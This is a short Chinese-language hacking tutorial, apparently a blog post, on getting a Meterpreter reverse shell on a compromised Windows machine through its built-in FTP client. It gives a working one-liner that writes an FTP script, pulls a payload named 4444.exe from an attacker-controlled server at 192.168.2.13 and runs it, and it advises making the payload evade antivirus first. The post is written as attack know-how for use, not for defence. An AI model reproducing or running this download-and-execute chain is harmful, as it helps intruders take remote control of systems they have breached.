通过Windows自带FTP一条命令反弹Meterpreter

简介

当我们在拿到一个cmd命令执行的口子的时候，我们需要高效的让目标技巧下载我们的文件，今天先分享一个通过win全版本都通用的ftp一条命令下载文件！

最近一直在学习，所以发的都是一些广告，兄弟们请谅解，我尽量每星期定时更新！

FTF反弹Meterpreter

FTP

首先在黑客机器上开启一个 ftp 服务（Slyar FTPserver）：root、root

其中 ftp 目录下有我们的 恶意程序：4444.exe（在实际情况下兄弟们需要提前做好免杀）

我们需要执行的命令是：

ftp
open 192.168.2.13 21
root
root
bin
get 4444.exe
bye

把这条命令整理成一条命令就是：

echo ftp>>1.txt&&echo open 192.168.2.13 21>>1.txt&&echo root>>1.txt&&echo root>>1.txt&&echo bin>>1.txt&&echo get 4444.exe>>1.txt&&echo bye>>1.txt&&ftp -s:1.txt&&4444.exe

原理是：连接目标ftp，然后下载文件 4444.exe 并执行。